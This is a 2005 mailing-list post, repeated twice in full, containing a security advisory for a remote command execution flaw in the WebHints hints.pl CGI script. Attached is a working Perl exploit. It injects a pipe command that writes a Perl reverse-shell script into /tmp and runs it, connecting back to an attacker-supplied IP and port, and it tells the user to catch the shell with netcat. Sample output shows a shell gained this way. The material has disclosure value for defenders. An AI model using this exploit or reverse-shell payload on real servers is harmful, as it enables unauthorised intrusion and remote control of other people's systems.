Emanuele \MadSheep\ Gentili
15/06/05, 20:45
This is a multi-part message in MIME format.
------=_NextPart_000_0008_01C57153.CE9D3280
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
MADSHEEP-05SA (security advisory): WebHints <= v1.03 Remote Command
Execution Vulnerability
06/11/2005
MADSHEEP-05SA (security advisory): WebHints <= v1.03 Remote Command
Execution Vulnerability
Published: 06 11 2005
Released: 06 11 2005
Name: WebHints
Affected Systems: <= 1.03
Issue: Remote Command Execution Vulnerability
Author: Emanuele "MadSheep" Gentili
Vendor: http://awsd.com/scripts/
Description
***********
Madroot Security group has discovered a flaw in WebHints <= 1.02. There is a
vulnerability in the current version of
WebHints. This issue occurs due to insufficient sanitization of externally
supplied data to the hints.pl script
that allows a remote user to pass an arbitrary shell command which will be
executed by the script. An attacker may
exploit this vulnerability to execute commands in the security context of
the web server hosting the affected script.
Details
*******
It's possibile for a remote attacker to retrieve any file from a webserver
and execute it. Multiple files are affected with this problem.
For example try this:
http://www.website/directory/hints.pl?|uname -a;id;uptime;pwd|
POF
*******
Exploit: http://madsheep.altervista.org/M4DR007-hints.pl
emanuele@blackbox:~$ perl new.pl
~~ www.madroot.edu.ms Security Group ~~
WebHints Software hints.cgi
Remote Command Execution Vulnerability
Affected version: <= all
~~ code by MadSheep ~~
06.11.2005
hostname:
localhost
port: (default: 80)
80
path: (/cgi-bin/)
/cgi-bin/
your ip (for reverse connect):
127.0.0.1
your port (for reverse connect):
7350
~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~
try to exploiting...
OK!
NOW, run in your box: nc -l -vv -p 7350
starting connect back on 127.0.0.1 :7350
DONE!
Look netcat windows and funny
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WARNING - WARNING - WARNING - WARNING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If connect back shell not found:
- you do not have privileges to write in /tmp
- Shell not vulnerable
We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk
emanuele@blackbox:~$
emanuele@blackbox:~$ nc -l -vv -p 7350
uid=1001(madhseep) gid=1001(madsheep) grupos=1001(madsheep)
enJoy
Solution
*********
The vendor has been contacted and a patch was not yet produced.
Credits
*******
Emanuele "MadSheep" Gentili - emanuele@orvietolug.org - www.madsheep.edu.ms
Come cheer us at #madroot on Freenode ( irc.freenode.net )
(C) 2004 Copyright by madroot Security Group
------=_NextPart_000_0008_01C57153.CE9D3280
Content-Type: application/octet-stream;
name="M4DR007-hints.pl"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="M4DR007-hints.pl"
#!/usr/bin/perl
#
#
#emanuele@blackbox:~$ perl M4DR007-hints.pl
#
#
# ~~ www.madroot.edu.ms Security Group ~~
#
# WebHints Software hints.perl
# Remote Command Execution Vulnerability
# Affected version: 1.3
# ~~ code by MadSheep ~~
#
#
# 06.11.2005
#
#
#hostname:
#localhost
#port: (default: 80)
#80
#path: (/cgi-bin/)
#/cgi-bin/
#your ip (for reverse connect):
#127.0.0.1
#your port (for reverse connect):
#7350
#
#
#~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~
# try to exploiting...
# OK!
# NOW, run in your box: nc -l -vv -p 7350
# starting connect back on 127.0.0.1 :7350
# DONE!
# Look netcat windows and funny
#
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# WARNING - WARNING - WARNING - WARNING
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#If connect back shell not found:
#- you do not have privileges to write in /tmp
#- Shell not vulnerable
#
#
#We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk
#
#
#emanuele@blackbox:~$
#
#
#emanuele@blackbox:~$ nc -l -vv -p 7350
#
# uid=3D1001(madhseep) gid=3D1001(madsheep) grupos=3D1001(madsheep)
#
#
#
# Come cheer us at #madroot on Freenode ( irc.freenode.net )
#
# (C) 2005 Copyright by madroot Security Group
#
#############################################
use IO::Socket;=20
print "\n\n ~~ www.madroot.edu.ms Security Group ~~ \n\n";
print " WebHints Software hints.pl\n";
print " Remote Command Execution Vulnerability\n";
print " Affected version: <=3D 1.3 \n";
print " ~~ code by MadSheep ~~\n\n\n";
print " 06.11.2005\n\n\n";
print "hostname: \n";=20
chomp($server=3D<STDIN>); =20
print "port: (default: 80)\n";
chomp($port=3D<STDIN>);
$port=3D80 if ($port =3D~/\D/ );
$port=3D80 if ($port eq "" );
print "path: (/cgi-bin/ecart/)\n";
chomp($path=3D<STDIN>);
print "your ip (for reverse connect): \n";
chomp($ip=3D<STDIN>);
print "your port (for reverse connect): \n";
chomp($reverse=3D<STDIN>);
print " \n\n";
print "~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~\r\n";
print " try to exploiting...\n";=20
$string=3D"/$path/hints.pl?|cd /tmp;echo ".q{use Socket;$execute=3D =
'echo "`uname -a`";echo =
"`id`";/bin/sh';$target=3D$ARGV[0];$port=3D$ARGV[1];$iaddr=3Dinet_aton($t=
arget) || die("Error: $!\n");$paddr=3Dsockaddr_in($port, $iaddr) || =
die("Error: $!\n");$proto=3Dgetprotobyname('tcp');socket(SOCKET, =
PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, =
$paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, =
">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." =
>>cbs.pl;perl cbs.pl $ip $reverse|";
print " OK! \n";=20
print " NOW, run in your box: nc -l -vv -p $reverse\n";
print " starting connect back on $ip :$reverse\n";
print " DONE!\n";
print " Look netcat windows and funny\n\n";
$socket=3DIO::Socket::INET->new( PeerAddr =3D> $server, PeerPort =3D> =
$port, Proto =3D> tcp)=20
or die;=20
print $socket "POST $path HTTP/1.1\n";=20
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "User-Agent: madsheep\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
print " WARNING - WARNING - WARNING - WARNING \r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\n";
print "If connect back shell not found:\n";
print "- you do not have privileges to write in /tmp\n";
print "- Shell not vulnerable\n\n\n";
print "We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - =
Mrk\n\n\n";
------=_NextPart_000_0008_01C57153.CE9D3280
Content-Type: text/plain;
name="MADSHEEP-05SA-hints.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="MADSHEEP-05SA-hints.txt"
MADSHEEP-05SA (security advisory): WebHints <=3D v1.03 Remote Command =
Execution Vulnerability
=20
06/11/2005
=20
MADSHEEP-05SA (security advisory): WebHints <=3D v1.03 Remote Command =
Execution Vulnerability
Published: 06 11 2005
Released: 06 11 2005
Name: WebHints
Affected Systems: <=3D 1.03
Issue: Remote Command Execution Vulnerability
Author: Emanuele "MadSheep" Gentili
Vendor: http://awsd.com/scripts/
Description
***********
Madroot Security group has discovered a flaw in WebHints <=3D 1.02. =
There is a vulnerability in the current version of=20
WebHints. This issue occurs due to insufficient sanitization of =
externally supplied data to the hints.pl script=20
that allows a remote user to pass an arbitrary shell command which will =
be executed by the script. An attacker may=20
exploit this vulnerability to execute commands in the security context =
of the web server hosting the affected script.
Details
*******
It's possibile for a remote attacker to retrieve any file from a =
webserver and execute it. Multiple files are affected with this problem.
For example try this:
http://www.website/directory/hints.pl?|uname -a;id;uptime;pwd|
POF
*******
Exploit: http://madsheep.altervista.org/M4DR007-hints.pl
emanuele@blackbox:~$ perl new.pl
~~ www.madroot.edu.ms Security Group ~~
WebHints Software hints.cgi
Remote Command Execution Vulnerability
Affected version: <=3D all
~~ code by MadSheep ~~
06.11.2005
hostname:
localhost
port: (default: 80)
80
path: (/cgi-bin/)
/cgi-bin/
your ip (for reverse connect):
127.0.0.1
your port (for reverse connect):
7350
~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~
try to exploiting...
OK!
NOW, run in your box: nc -l -vv -p 7350
starting connect back on 127.0.0.1 :7350
DONE!
Look netcat windows and funny
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WARNING - WARNING - WARNING - WARNING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If connect back shell not found:
- you do not have privileges to write in /tmp
- Shell not vulnerable
We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk
emanuele@blackbox:~$
emanuele@blackbox:~$ nc -l -vv -p 7350
uid=3D1001(madhseep) gid=3D1001(madsheep) grupos=3D1001(madsheep)
enJoy
Solution
*********
The vendor has been contacted and a patch was not yet produced.
Credits
*******
Emanuele "MadSheep" Gentili - emanuele@orvietolug.org - =
www.madsheep.edu.ms
Come cheer us at #madroot on Freenode ( irc.freenode.net )
(C) 2004 Copyright by madroot Security Group
------=_NextPart_000_0008_01C57153.CE9D3280--
------=_NextPart_000_0008_01C57153.CE9D3280
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
MADSHEEP-05SA (security advisory): WebHints <= v1.03 Remote Command
Execution Vulnerability
06/11/2005
MADSHEEP-05SA (security advisory): WebHints <= v1.03 Remote Command
Execution Vulnerability
Published: 06 11 2005
Released: 06 11 2005
Name: WebHints
Affected Systems: <= 1.03
Issue: Remote Command Execution Vulnerability
Author: Emanuele "MadSheep" Gentili
Vendor: http://awsd.com/scripts/
Description
***********
Madroot Security group has discovered a flaw in WebHints <= 1.02. There is a
vulnerability in the current version of
WebHints. This issue occurs due to insufficient sanitization of externally
supplied data to the hints.pl script
that allows a remote user to pass an arbitrary shell command which will be
executed by the script. An attacker may
exploit this vulnerability to execute commands in the security context of
the web server hosting the affected script.
Details
*******
It's possibile for a remote attacker to retrieve any file from a webserver
and execute it. Multiple files are affected with this problem.
For example try this:
http://www.website/directory/hints.pl?|uname -a;id;uptime;pwd|
POF
*******
Exploit: http://madsheep.altervista.org/M4DR007-hints.pl
emanuele@blackbox:~$ perl new.pl
~~ www.madroot.edu.ms Security Group ~~
WebHints Software hints.cgi
Remote Command Execution Vulnerability
Affected version: <= all
~~ code by MadSheep ~~
06.11.2005
hostname:
localhost
port: (default: 80)
80
path: (/cgi-bin/)
/cgi-bin/
your ip (for reverse connect):
127.0.0.1
your port (for reverse connect):
7350
~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~
try to exploiting...
OK!
NOW, run in your box: nc -l -vv -p 7350
starting connect back on 127.0.0.1 :7350
DONE!
Look netcat windows and funny
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WARNING - WARNING - WARNING - WARNING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If connect back shell not found:
- you do not have privileges to write in /tmp
- Shell not vulnerable
We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk
emanuele@blackbox:~$
emanuele@blackbox:~$ nc -l -vv -p 7350
uid=1001(madhseep) gid=1001(madsheep) grupos=1001(madsheep)
enJoy
Solution
*********
The vendor has been contacted and a patch was not yet produced.
Credits
*******
Emanuele "MadSheep" Gentili - emanuele@orvietolug.org - www.madsheep.edu.ms
Come cheer us at #madroot on Freenode ( irc.freenode.net )
(C) 2004 Copyright by madroot Security Group
------=_NextPart_000_0008_01C57153.CE9D3280
Content-Type: application/octet-stream;
name="M4DR007-hints.pl"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="M4DR007-hints.pl"
#!/usr/bin/perl
#
#
#emanuele@blackbox:~$ perl M4DR007-hints.pl
#
#
# ~~ www.madroot.edu.ms Security Group ~~
#
# WebHints Software hints.perl
# Remote Command Execution Vulnerability
# Affected version: 1.3
# ~~ code by MadSheep ~~
#
#
# 06.11.2005
#
#
#hostname:
#localhost
#port: (default: 80)
#80
#path: (/cgi-bin/)
#/cgi-bin/
#your ip (for reverse connect):
#127.0.0.1
#your port (for reverse connect):
#7350
#
#
#~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~
# try to exploiting...
# OK!
# NOW, run in your box: nc -l -vv -p 7350
# starting connect back on 127.0.0.1 :7350
# DONE!
# Look netcat windows and funny
#
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# WARNING - WARNING - WARNING - WARNING
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#If connect back shell not found:
#- you do not have privileges to write in /tmp
#- Shell not vulnerable
#
#
#We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk
#
#
#emanuele@blackbox:~$
#
#
#emanuele@blackbox:~$ nc -l -vv -p 7350
#
# uid=3D1001(madhseep) gid=3D1001(madsheep) grupos=3D1001(madsheep)
#
#
#
# Come cheer us at #madroot on Freenode ( irc.freenode.net )
#
# (C) 2005 Copyright by madroot Security Group
#
#############################################
use IO::Socket;=20
print "\n\n ~~ www.madroot.edu.ms Security Group ~~ \n\n";
print " WebHints Software hints.pl\n";
print " Remote Command Execution Vulnerability\n";
print " Affected version: <=3D 1.3 \n";
print " ~~ code by MadSheep ~~\n\n\n";
print " 06.11.2005\n\n\n";
print "hostname: \n";=20
chomp($server=3D<STDIN>); =20
print "port: (default: 80)\n";
chomp($port=3D<STDIN>);
$port=3D80 if ($port =3D~/\D/ );
$port=3D80 if ($port eq "" );
print "path: (/cgi-bin/ecart/)\n";
chomp($path=3D<STDIN>);
print "your ip (for reverse connect): \n";
chomp($ip=3D<STDIN>);
print "your port (for reverse connect): \n";
chomp($reverse=3D<STDIN>);
print " \n\n";
print "~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~\r\n";
print " try to exploiting...\n";=20
$string=3D"/$path/hints.pl?|cd /tmp;echo ".q{use Socket;$execute=3D =
'echo "`uname -a`";echo =
"`id`";/bin/sh';$target=3D$ARGV[0];$port=3D$ARGV[1];$iaddr=3Dinet_aton($t=
arget) || die("Error: $!\n");$paddr=3Dsockaddr_in($port, $iaddr) || =
die("Error: $!\n");$proto=3Dgetprotobyname('tcp');socket(SOCKET, =
PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, =
$paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, =
">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." =
>>cbs.pl;perl cbs.pl $ip $reverse|";
print " OK! \n";=20
print " NOW, run in your box: nc -l -vv -p $reverse\n";
print " starting connect back on $ip :$reverse\n";
print " DONE!\n";
print " Look netcat windows and funny\n\n";
$socket=3DIO::Socket::INET->new( PeerAddr =3D> $server, PeerPort =3D> =
$port, Proto =3D> tcp)=20
or die;=20
print $socket "POST $path HTTP/1.1\n";=20
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "User-Agent: madsheep\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
print " WARNING - WARNING - WARNING - WARNING \r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\n";
print "If connect back shell not found:\n";
print "- you do not have privileges to write in /tmp\n";
print "- Shell not vulnerable\n\n\n";
print "We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - =
Mrk\n\n\n";
------=_NextPart_000_0008_01C57153.CE9D3280
Content-Type: text/plain;
name="MADSHEEP-05SA-hints.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="MADSHEEP-05SA-hints.txt"
MADSHEEP-05SA (security advisory): WebHints <=3D v1.03 Remote Command =
Execution Vulnerability
=20
06/11/2005
=20
MADSHEEP-05SA (security advisory): WebHints <=3D v1.03 Remote Command =
Execution Vulnerability
Published: 06 11 2005
Released: 06 11 2005
Name: WebHints
Affected Systems: <=3D 1.03
Issue: Remote Command Execution Vulnerability
Author: Emanuele "MadSheep" Gentili
Vendor: http://awsd.com/scripts/
Description
***********
Madroot Security group has discovered a flaw in WebHints <=3D 1.02. =
There is a vulnerability in the current version of=20
WebHints. This issue occurs due to insufficient sanitization of =
externally supplied data to the hints.pl script=20
that allows a remote user to pass an arbitrary shell command which will =
be executed by the script. An attacker may=20
exploit this vulnerability to execute commands in the security context =
of the web server hosting the affected script.
Details
*******
It's possibile for a remote attacker to retrieve any file from a =
webserver and execute it. Multiple files are affected with this problem.
For example try this:
http://www.website/directory/hints.pl?|uname -a;id;uptime;pwd|
POF
*******
Exploit: http://madsheep.altervista.org/M4DR007-hints.pl
emanuele@blackbox:~$ perl new.pl
~~ www.madroot.edu.ms Security Group ~~
WebHints Software hints.cgi
Remote Command Execution Vulnerability
Affected version: <=3D all
~~ code by MadSheep ~~
06.11.2005
hostname:
localhost
port: (default: 80)
80
path: (/cgi-bin/)
/cgi-bin/
your ip (for reverse connect):
127.0.0.1
your port (for reverse connect):
7350
~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~
try to exploiting...
OK!
NOW, run in your box: nc -l -vv -p 7350
starting connect back on 127.0.0.1 :7350
DONE!
Look netcat windows and funny
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WARNING - WARNING - WARNING - WARNING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If connect back shell not found:
- you do not have privileges to write in /tmp
- Shell not vulnerable
We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk
emanuele@blackbox:~$
emanuele@blackbox:~$ nc -l -vv -p 7350
uid=3D1001(madhseep) gid=3D1001(madsheep) grupos=3D1001(madsheep)
enJoy
Solution
*********
The vendor has been contacted and a patch was not yet produced.
Credits
*******
Emanuele "MadSheep" Gentili - emanuele@orvietolug.org - =
www.madsheep.edu.ms
Come cheer us at #madroot on Freenode ( irc.freenode.net )
(C) 2004 Copyright by madroot Security Group
------=_NextPart_000_0008_01C57153.CE9D3280--